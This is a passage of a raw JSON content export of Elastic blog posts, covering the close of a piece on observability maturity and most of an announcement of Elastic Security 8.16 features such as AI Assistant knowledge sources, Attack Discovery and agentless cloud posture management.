(ML)\u003c/strong\u003e\u003c/span\u003e\u003cstrong\u003e\u003c/strong\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e: \u003c/strong\u003e72% of teams are already using AI/ML for observability. Look for opportunities to implement these technologies, particularly for helpful use cases like log correlation and anomaly detection.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eStandardize on OpenTelemetry\u003c/strong\u003e\u003c/span\u003e\u003cstrong\u003e\u003c/strong\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e:\u003c/strong\u003e While adoption is still in the early stages, 87% of decision-makers see it becoming a standard within five years. Start experimenting with OTel now to future-proof your observability stack.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eUnify your observability platform\u003c/strong\u003e\u003c/span\u003e\u003cstrong\u003e\u003c/strong\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e: \u003c/strong\u003eConsider platforms like Elastic Observability that integrate logs, metrics, and APM. This can help address the tool scale and performance issues that mature teams often face.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIf you’d like more details and observability insights, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/observability/white-paper/state-of-observability-practitioner-perspective\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003edownload the 2024 State of Observability: A practitioner perspective report\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The role of leadership for observability maturity","_metadata":{"uid":"cs919657f9855e15af"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOne interesting finding from the survey was the disconnect between practitioners and leadership when it comes to understanding the value of new technologies like OpenTelemetry. As SREs, we have an opportunity (and, I'd argue, a responsibility) to bridge this gap. Here are a few ways to do that:\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eQuantify the impact\u003c/strong\u003e\u003c/span\u003e\u003cstrong\u003e\u003c/strong\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e: \u003c/strong\u003eUse data to show how improved observability translates to better business outcomes.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSpeak the language of business\u003c/strong\u003e\u003c/span\u003e\u003cstrong\u003e\u003c/strong\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e:\u003c/strong\u003e Frame observability improvements in terms of customer satisfaction, revenue protection, and operational efficiency.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eAdvocate for resources\u003c/strong\u003e\u003c/span\u003e\u003cstrong\u003e\u003c/strong\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e:\u003c/strong\u003e Use the data from this survey to make the case for investing in observability maturity.\u003c/span\u003e\u003c/li\u003e\u003c/ol\u003e"},{"title_l10n":"The observability journey never ends ","_metadata":{"uid":"cs8a5865c36dd38b47"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eRemember, observability maturity isn't a destination — it's a journey. Even those 7% who classify themselves as experts are continually learning and adapting. The key is to keep pushing forward, learning from each incident, and continuously refining your practices. You’ll start to reduce toil for your team and allow everyone to focus on higher value activities.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs you progress on this journey, you'll likely find that your role as an SRE becomes more rewarding. You'll spend less time firefighting and more time on proactive improvements. You'll collaborate more effectively with other teams. And most importantly, you'll deliver more reliable, performant services to your users.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSo, whether you're just starting out or well on your way to expert status, keep leveling up your observability maturity. Your future self (and your users) will thank you. Take the \u003c/span\u003e\u003ca href=\"https://elastic.co/observability/maturity-assessment\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Observability Maturity Assessment\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to find out where you stand with observability today!\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csfdc56128c48465b9"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs4bd5e0e4de8efd49"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5e5696549d93b983"}}}],"publish_date":"2024-11-21","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Level up your observability practice: Common challenges, practical steps, and the importance of leadership","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"Lessons from the front lines: Challenges in your observability maturity journey ","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"bltf4e6f8fad967f3c1","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-11-21T02:23:37.767Z","created_by":"bltb6c155cd84fc0c1a","file_size":"173891","filename":"139686_-_Elastic_-_Headers_-_V1_2_(1).jpg","parent_uid":null,"tags":[],"title":"139686 - Elastic - Headers - V1_2 (1).jpg","updated_at":"2024-11-21T02:23:37.767Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-21T15:01:00.266Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf4e6f8fad967f3c1/673e99a94ba87662945abaa8/139686_-_Elastic_-_Headers_-_V1_2_(1).jpg"},"title":"Leveling up your observability practice — Part 2","title_l10n":"Leveling up your observability practice — Part 2","updated_at":"2024-11-21T03:02:26.647Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/observability-maturity-lessons-leadership-part2","publish_details":{"time":"2024-11-21T15:01:00.244Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt160dca3d3069387a","_version":14,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic Security 8.16 delivers simplified and seamless data onboarding with agentless integrations, vendor-agnostic cloud security workflows for contextualized threat investigation, and custom knowledge base support for Elastic AI Assistant.","author":["blta7d0dd0fb0246103","blt57a714298299b145","bltf79747ba548dc6e3","blt0b3b04f529a7fbd3","bltf5623399e4d8e6e2","blt47281ee31f9b7aa9","blt2c6750b198c527ec","blt2197c290679d2e28"],"category":["bltfaae4466058cc7d6"],"created_at":"2024-11-08T20:53:17.515Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csed2c858c1d8d4ad0"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003eElastic Security 8.16 is now available, advancing our mission to streamline security workflows with enhanced data accessibility and AI-driven analytics. Key updates include agentless onboarding for faster cloud security posture management (CSPM) and asset discovery; expanded integrations with Wiz, AWS Security Hub, and Falco for contextualized threat detection; custom knowledge sources for Elastic AI Assistant; and improved support for locally hosted large language models (LLMs).\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003eThese new features deliver practical solutions that improve investigation efficiency and strengthen overall security operations for teams everywhere.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003eElastic\u003c/span\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003e Security 8.16 \u003c/span\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003eis \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/registration?elektra=whats-new-elastic-7-13-blog\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eavailable now on Elastic Cloud\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003e — the only hosted Elasticsearch offering to include all of the new features in this latest release. You can also \u003c/span\u003e\u003ca href=\"https://www.elastic.co/downloads/\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003edownload the Elastic Stack\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003e and our cloud orchestration products — Elastic Cloud Enterprise and Elastic Cloud for Kubernetes — for a self-managed experience.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cem\u003e\u003c/em\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003eWhat else is new in Elastic 8.16? Check out the \u003c/em\u003e\u003c/span\u003e\u003cem\u003e\u003c/em\u003e\u003ca href=\"https://www.elastic.co/blog/whats-new-elastic-8-16-0\"\u003e\u003cem\u003e\u003c/em\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e8.16 announcement blog\u003c/em\u003e\u003c/span\u003e\u003cem\u003e\u003c/em\u003e\u003c/a\u003e\u003cem\u003e\u003c/em\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e to learn more.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Elastic AI Assistant adds support for custom knowledge sources","_metadata":{"uid":"cs1d188c11b903e45e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://www.elastic.co/security/ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic AI Assistant\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e has already proven valuable in alert investigations, assisting with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Attack Discovery\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e findings, query generation, and much more. Now, it goes further by allowing custom knowledge sources to be added.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis update to Elastic AI Assistant takes interactions to a whole new level. You can now add custom sources to the assistant as additional knowledge. This means you are no longer bound to the knowledge a given LLM is trained on, and you can add knowledge sources beyond what Elastic provides.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csac535935c9736865"}}},{"image":{"image":{"uid":"bltd65303b669977f66","_version":1,"title":"image8.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-08T21:38:44.934Z","updated_at":"2024-11-08T21:38:44.934Z","content_type":"image/png","file_size":"286816","filename":"image8.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:53:57.307Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd65303b669977f66/672e84e44d178ef52413a80c/image8.png"},"_metadata":{"uid":"cs8798289770eaa443"},"caption_l10n":"","alt_text_l10n":"security ai settings","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csdb51d5e0d5dfd37c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eCustom knowledge sources can take the form of a simple text or markdown entry as well as an index that has been configured with a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/semantic-text.html\"\u003e\u003cspan style='font-size: 12pt;'\u003esemantic text\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e field. The new knowledge settings user interface makes the process of adding knowledge sources a breeze, allowing you to configure the content and the sharing settings for that knowledge.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs089835dd008922c2"}}},{"image":{"image":{"uid":"blt0842d9ff744ec311","_version":1,"title":"image6.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-08T21:39:01.972Z","updated_at":"2024-11-08T21:39:01.972Z","content_type":"image/png","file_size":"395937","filename":"image6.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:53:57.262Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0842d9ff744ec311/672e84f5020af3832fbe5d26/image6.png"},"_metadata":{"uid":"cs22dd755ef935f499"},"caption_l10n":"","alt_text_l10n":"new doc entry","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs5b79118611edb1d9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn addition, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic AI Assistant\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e can now be asked to remember content as knowledge during a conversation. Simply tell the Elastic AI Assistant what you would like remembered, and it will be available as a custom knowledge source going forward.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHere are some examples of how custom knowledge sources can be used:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAttaching an index containing asset information, such as content found in a configuration management database (CMDB)\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAdding your favorite threat intelligence reports to be used during a conversation\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDocuments containing any existing threat hunting playbooks or standard operating procedures\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHistorical incident or case information\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOn-call schedules\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"csef0db84499b0a2df"}}},{"video":{"vidyard_uuid":"oABkaBHGd7tMEe77fFyvCg","_metadata":{"uid":"csc05b9e82a5385b6d"},"caption_l10n":"","shadow":false,"video_play_count":"","muted":false,"loop_video":true,"hide_controls":false,"looping_animation":true}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs2d2018605e0bc3b0"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003eVisit \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-ai-assistant-custom-knowledge-sources\"\u003e\u003cspan style='font-size: 12pt;'\u003ethe blog on custom knowledge\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003e for more information.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Elastic Security Labs content now integrated as an Elastic AI Assistant knowledge source","_metadata":{"uid":"cs74a8f636be2ceac9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://www.elastic.co/security-labs\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Security Labs\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e continuously provides \u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/security/report/global-threat-report\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ecutting-edge research\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e on emerging threats, including novel malware, advanced threat groups, and detailed analysis of security incidents. This wealth of knowledge is now directly accessible through Elastic AI Assistant for Security. Whether you're responding to an active incident, conducting a threat hunting exercise, or simply looking for a quick summary, the assistant can reference Elastic Security Labs content to offer deeper context and informed insights.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSecurity teams can use these insights to enhance threat detection and response strategies, ensuring they stay ahead of evolving threats. The Elastic AI Assistant now includes all Elastic Security Labs content published up until September 2024, making it a powerful tool for faster, more informed decision-making in real-time scenarios.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs20198de04e11cdea"}}},{"video":{"vidyard_uuid":"MyoSVRhRicK889Dt2z75LU","_metadata":{"uid":"cse3cc2d5cad0cfdad"},"caption_l10n":"","shadow":false,"video_play_count":"","muted":false,"loop_video":true,"hide_controls":false,"looping_animation":true}},{"title_text":{"title_text":[{"title_l10n":"Elastic Attack Discovery now supports higher alert counts, role-based access control, and improved result accuracy","_metadata":{"uid":"cs061f4fa6bc34b9e5"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUp until the 8.16 release, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/ai-driven-security-analytics\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Attack Discovery\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e was able to process and discover attacks by analyzing up to a maximum of 100 alerts. This limit has now been increased to 500 alerts, and we’ve made it easier to configure from within the Elastic Attack Discovery screen itself.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn addition, we’ve made significant improvements to result accuracy, error handling, and have added role-based access control (RBAC) for the feature.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd74a162786f7778f"}}},{"video":{"vidyard_uuid":"yt6epGJ4HHhY35Q6h2QWjs","_metadata":{"uid":"cs4bd2039b3f649c14"},"caption_l10n":"","shadow":false,"video_play_count":"","muted":false,"loop_video":true,"hide_controls":false,"looping_animation":true}},{"title_text":{"title_text":[{"title_l10n":"Improved support for locally hosted models","_metadata":{"uid":"csa43f3c0eb87ccc75"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith this release, we’ve made it even easier to use locally hosted LLMs with Elastic AI Assistant and Attack Discovery. The OpenAI connector has been updated to better highlight this capability. We’ve also made significant improvements to the Elastic AI Assistant and Attack Discovery when using locally hosted and open source models.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs0bfc846f0caa9cd9"}}},{"image":{"image":{"uid":"blt6f5164820f0db65a","_version":1,"title":"image2.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-08T21:39:44.406Z","updated_at":"2024-11-08T21:39:44.406Z","content_type":"image/png","file_size":"290852","filename":"image2.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:53:57.194Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6f5164820f0db65a/672e8520170171247ff00a5f/image2.png"},"_metadata":{"uid":"cs13af2e21a4e709df"},"caption_l10n":"","alt_text_l10n":"openai connector","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Elastic Automatic Import expands support for new AI models and log formats","_metadata":{"uid":"cs2f9a5b424efca5b0"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSince its recent debut in the Elastic 8.15 release, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/automatic-import-ai-data-integration-builder\"\u003e\u003cspan style='font-size: 12pt;'\u003eAutomatic Import\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e now automates the development of custom data integrations — streamlining the custom data onboarding process from hours to just minutes. Now, this feature supports additional AI models such as Amazon Bedrock, OpenAI, and Google Gemini.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUsers can also take advantage of expanded log format compatibility, making it easier to parse and normalize various types of logs — from structured to unstructured and CSV formats. This enhancement simplifies data ingestion, enabling users to focus more on analysis and threat detection.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Agentless CSPM and cloud asset inventory management","_metadata":{"uid":"cs89655836aef86c62"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Security introduces agentless integration for both CSPM and a new Cloud Asset Inventory, which is currently released in public beta. This new capability removes the need for agents, allowing users to quickly establish trust between their cloud providers — AWS, Azure, or GCP — and Elastic Cloud, speeding up data ingestion to just minutes.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith this option, discovering cloud assets and monitoring security posture becomes more efficient — all without managing agents.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7e711c420860df3f"}}},{"image":{"image":{"uid":"blt163f67b7dfef928b","_version":1,"title":"Screenshot 2024-11-08 at 4.41.13 PM.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-08T21:41:24.679Z","updated_at":"2024-11-08T21:41:24.679Z","content_type":"image/png","file_size":"90389","filename":"Screenshot_2024-11-08_at_4.41.13_PM.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:53:57.290Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt163f67b7dfef928b/672e8584064225c4ccdc9e3f/Screenshot_2024-11-08_at_4.41.13_PM.png"},"_metadata":{"uid":"cs9d5e37d076039004"},"caption_l10n":"","alt_text_l10n":"cloud security posture management","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"image":{"image":{"uid":"blt49e15e7033083321","_version":1,"title":"image12.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-08T21:40:30.701Z","updated_at":"2024-11-08T21:40:30.701Z","content_type":"image/png","file_size":"22014","filename":"image12.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:53:57.174Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt49e15e7033083321/672e854e252d98be45a0788e/image12.png"},"_metadata":{"uid":"cs8bf28613f57be6ec"},"caption_l10n":"","alt_text_l10n":"agentless beta","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"callout":{"title_l10n":"","_metadata":{"uid":"cs83d0ed7a442be559"},"paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eNote:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Agent-based integration for CSPM is still available as an alternative.\u003c/span\u003e\u003c/p\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"New Cloud Asset Inventory integration in technical preview","_metadata":{"uid":"csc52e03e0026fe97a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou can't protect what you don't know. With the new Elastic Security Cloud Asset Inventory integration, you can discover your cloud resources across AWS, GCP, and Microsoft Azure. By simply connecting your cloud accounts with read-only access, this integration automatically finds your cloud services and assets, including S3 buckets, EC2 instances, Azure Virtual Machines, GCP Compute Engine instances, and more.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith these assets brought into Elastic Security, you can add valuable context to your threat detections and use Elastic's powerful detection engine to craft security and compliance checks over this rich asset metadata. This helps ensure that your cloud environment is properly configured like verifying that multifactor authentication (MFA) is enabled for your cloud users.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhether you're tracking assets for compliance or investigating security incidents, the Cloud Asset Inventory integration gives you a clear view of your cloud footprint, helping you stay secure.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csdf09eb586e926507"}}},{"image":{"image":{"uid":"bltf021a2db654ce965","_version":1,"title":"image3.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-08T21:41:52.319Z","updated_at":"2024-11-08T21:41:52.319Z","content_type":"image/png","file_size":"297307","filename":"image3.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:53:57.355Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf021a2db654ce965/672e85a0e9a3c6e4e7f523cf/image3.png"},"_metadata":{"uid":"csd2de563e5198c243"},"caption_l10n":"","alt_text_l10n":"cloud asset overview","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Contextualized threat detection for Wiz, AWS Security Hub, and Falco data","_metadata":{"uid":"csfab48686c0a454de"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(17, 17, 17);font-size: 12pt;\"\u003eElastic Security is also introducing native cloud security workflows for third-party security tools, including \u003ca href=\"/blog/cncf-open-source-security-tools\" target=\"_self\"\u003eCNCF open source tools\u003c/a\u003e — enhancing threat detection and investigation. This feature integrates posture and vulnerability findings with runtime security alerts from top vendors like \u003c/span\u003e\u003ca href=\"https://www.elastic.co/integrations/data-integrations?solution=all-solutions\u0026category=security\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWiz, AWS Security Hub, and Falco\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(17, 17, 17);font-size: 12pt;\"\u003e, enabling seamless, out-of-the-box investigations from alerts, hosts, users, and findings workflows.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csf87e450501a5a9c6"}}},{"image":{"image":{"uid":"blt58585833fc96fdf6","_version":1,"title":"image9.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-08T21:42:15.587Z","updated_at":"2024-11-08T21:42:15.587Z","content_type":"image/png","file_size":"378628","filename":"image9.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:53:57.272Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt58585833fc96fdf6/672e85b74c9c31b9ad018482/image9.png"},"_metadata":{"uid":"csfebb84626bbe96b4"},"caption_l10n":"","alt_text_l10n":"findings","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs7e62f403ad5b3534"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(17, 17, 17);font-size: 12pt;\"\u003eOur focus is to deliver vendor-agnostic workflows, simplifying the investigation process and enhancing productivity for security teams. Dive deeper into the power of this integrated approach in \u003ca href=\"http://www.elastic.co/blog/elastic-integrates-leading-cloud-security-vendors\" target=\"_self\"\u003ethis blog\u003c/a\u003e with a scenario-driven example..\u003c/span\u003e\u003cspan style=\"color: rgb(17, 17, 17);font-size: 12pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(17, 17, 17);font-size: 12pt;\"\u003eWe welcome your feedback on which vendors you’d like to see included. Join our \u003c/span\u003e\u003ca href=\"https://elasticstack.slack.com/archives/C050VCUJY2H\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003ecommunity Slack\u003c/a\u003e\u003cspan 